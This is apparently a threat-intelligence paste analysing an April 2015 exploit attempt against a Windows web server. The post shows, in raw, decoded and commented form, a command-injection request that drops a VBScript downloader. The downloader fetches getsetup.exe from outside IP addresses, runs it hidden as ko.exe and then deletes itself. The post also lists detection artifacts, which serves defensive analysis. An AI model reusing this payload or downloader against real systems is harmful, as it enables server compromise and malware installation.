Kleissner

Windows Server Side Exploit attempt from 122.228.207.244

Apr 2nd, 2015
  1. https://virustracker.net/122.228.207.244
  2.  
  3. The request shows a server-side exploit attempt: a %00 (null byte) is placed in the search parameter, followed by Visual Basic Script (VBScript) code. This is the request path:
  4.  
  5. /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222.vbs.}
  6.  
  7. Decoded (URL-decoded; the %00 byte is not shown in this form):
  8.  
  9. /?search=={.exec|cmd.exe /c echo>22222.vbs dim wait,quit,out:Set xml=CreateObject("Microsoft.XMLHTTP"):Set WshShell = Wscript.CreateObject("WScript.Shell") :DS=Array("123.108.109.100","123.108.109.100:53","123.108.109.100:443","178.33.196.164","178.33.196.164:53","178.33.196.164:443"):for each Url in DS:wait=true:quit=false:D(Url):if quit then:exit for:end if:next:Sub D(Url):if IsObject(xml)=false then:Set xml=CreateObject("Microsoft.XMLHTTP"):end if :xml.Open "GET","http://"^&Url^&"/getsetup.exe",True:xml.OnReadyStateChange=GetRef("xmlstat"):out=Now:xml.Send():while(wait and 60^>abs(datediff("s",Now,out))):wscript.sleep(1000):wend:End Sub:sub xmlstat():If xml.ReadyState^<^>4 Then:exit sub:end if:wait=false:if xml.status^<^>200 then:exit sub:end if:quit=true:on error resume next:set sGet=CreateObject("ADODB.Stream"):sGet.Mode=3:sGet.Type=1:sGet.Open():sGet.Write xml.ResponseBody:sGet.SaveToFile "ko.exe",2:End sub:WshShell.run "ko.exe",0,0:Set fso =CreateObject("Scripting.Filesystemobject") :fso.DeleteFile(WScript.ScriptFullName) & cscript 22222.vbs.}
  10.  
  11.  
  12. Beautified:
  13.  
  ' Captured downloader stage, shown for analysis. Comments were added; the numbered code lines are unchanged.
  ' Summary: tries each DS entry in turn, requests http://<entry>/getsetup.exe, saves a 200 response as ko.exe,
  ' runs it with a hidden window, then deletes this script file.
  ' Artifacts on this page useful for detection: 22222.vbs and ko.exe written by the web server process,
  ' cmd.exe starting cscript, and outbound HTTP GETs for /getsetup.exe to the DS hosts (also on ports 53 and 443).
  ' The ^ before &, < and > are cmd.exe escape characters left over from the echo command in the request;
  ' cmd.exe presumably strips them when the file is written, so they are not part of the VBScript itself.
  14. dim wait,quit,out ' wait/quit are flags shared with the xmlstat callback; out holds the request start time
  15. Set xml=CreateObject("Microsoft.XMLHTTP") ' HTTP client COM object
  16. Set WshShell = Wscript.CreateObject("WScript.Shell") ' used at the end to launch ko.exe
  ' NOTE: the beautifier broke lines at every ':' separator, including inside string literals. The decoded
  ' request above shows these entries as host:port strings ("123.108.109.100:53", "178.33.196.164:443", ...).
  ' Items 17-21 are therefore a single Array(...) statement with six download hosts.
  17. DS=Array("123.108.109.100","123.108.109.100
  18. 53","123.108.109.100
  19. 443","178.33.196.164","178.33.196.164
  20. 53","178.33.196.164
  21. 443")
  22. for each Url in DS ' try each host in order
  23.     wait=true
  24.     quit=false
  25.     D(Url) ' start the download and block until the callback fires or 60 seconds pass
  26.     if quit then ' xmlstat sets quit once a 200 response is received
  27.         exit for
  28.     end if
  29. next
  30. Sub D(Url) ' issue an asynchronous GET for /getsetup.exe on the given host and wait for it
  31.     if IsObject(xml)=false then
  32.         Set xml=CreateObject("Microsoft.XMLHTTP")
  33.     end if
  34.     xml.Open "GET","http://"^&Url^&"/getsetup.exe",True ' third argument True = asynchronous; plain HTTP even for the :53 and :443 entries
  35.     xml.OnReadyStateChange=GetRef("xmlstat") ' xmlstat runs on every readyState change
  36.     out=Now
  37.     xml.Send()
  38.     while(wait and 60^>abs(datediff("s",Now,out))) ' poll until xmlstat clears wait or 60 seconds have elapsed
  39.     wscript.sleep(1000) ' loop body (mis-indented by the beautifier): sleep one second per iteration
  40. wend
  41. End Sub
  42. sub xmlstat() ' readyState callback: on a completed 200 response, write the body to ko.exe
  43. If xml.ReadyState^<^>4 Then ' 4 = request complete; ignore earlier states
  44.     exit sub
  45. end if
  46. wait=false ' releases the polling loop in D
  47. if xml.status^<^>200 then ' a non-200 status leaves quit false, so the main loop moves on to the next host
  48.     exit sub
  49. end if
  50. quit=true
  51. on error resume next ' errors while saving the file are suppressed
  52. set sGet=CreateObject("ADODB.Stream")
  53. sGet.Mode=3 ' read/write
  54. sGet.Type=1 ' binary
  55. sGet.Open()
  56. sGet.Write xml.ResponseBody
  57. sGet.SaveToFile "ko.exe",2 ' relative path, so the file lands in the process's current directory; 2 = overwrite if present
  58. End sub
  59. WshShell.run "ko.exe",0,0 ' window style 0 = hidden; final 0 = do not wait for the process to exit
  60. Set fso =CreateObject("Scripting.Filesystemobject")
  61. fso.DeleteFile(WScript.ScriptFullName) ' the script deletes itself, so 22222.vbs may be gone by the time the host is examined